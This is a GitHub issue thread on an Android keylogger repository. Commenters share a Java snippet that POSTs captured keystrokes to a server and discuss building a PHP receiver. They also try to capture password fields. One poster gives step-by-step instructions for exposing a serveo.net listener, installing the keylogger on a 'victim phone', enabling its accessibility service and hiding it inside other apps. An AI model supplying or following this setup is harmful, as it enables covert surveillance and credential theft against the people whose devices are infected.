-
Notifications
You must be signed in to change notification settings - Fork 54
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Timestamp #1
Comments
Lo que hice yo, fue cambiar la parte donde se hace el envio post al servidor, te copio el codigo aqui: BasicNameValuePair textBasicNameValuePAir= new BasicNameValuePair("Text", params[0]); List nameValuePairList = new ArrayList(); UrlEncodedFormEntity urlEncodedFormEntity = new UrlEncodedFormEntity(nameValuePairList); y del lado de php o cualquier lenguaje te va llegar un POST en la variable "Text" Saludos |
@zonavip |
whats?
Obtener Outlook para Android<https://aka.ms/ghei36>
…________________________________
From: Harshul <[email protected]>
Sent: Thursday, August 9, 2018 1:19:05 AM
To: bshu2/Android-Keylogger
Cc: zonavip; Mention
Subject: Re: [bshu2/Android-Keylogger] Timestamp (#1)
@zonavip<https://github.com/zonavip>
How did you manage to write the server sided code on PHP.
Can you elaborate ?
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub<#1 (comment)>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ANbWOQNB0lcrSa53UAKReffqsrTJPGhRks5uO7g5gaJpZM4RAd2b>.
|
@zonavip |
Okay, It took me a while but I have completed porting the server part from "Go" to "PHP". |
@zonavip Yes your code helped me a lot, but still there's a problem in getting the "password" field texts, maybe it's all to do with that "TEXT MASK". |
Hi can you post php code? I was trying to deploy go code on google appengine but it not work for me |
@mario8883 Yes I can but I need a little donation for that ! |
Contact me |
@zonavip Who me ? |
If you want to use this keylogger , and you don't have a website , you can use serveo to make a listener.
link on Keylogger.java file with
And compile it ,install it, enable accessibility option in settings for it Then , here is that php file you requested
And name it keys.php , and put it in on any directory Then , run your own website for receiving data
(You'll need php and openssh / autossh packages , install them using apt-get install ) Then , your https://anythinHere.serveo.net/keys.php link can be accessed through the internet ! Now , connect the victim phone to the internet ,install that keylogger , enable its accessibility service in settings it'll start keylogging every stuff ! (Personally tested , and it's damn good !) My contact info:- |
You can bind / embedded this keylogger on apps too , and it works great |
@bshu2
Hi there,
Good job;
How did u set up the server page for that? Is it gcp?
The text was updated successfully, but these errors were encountered: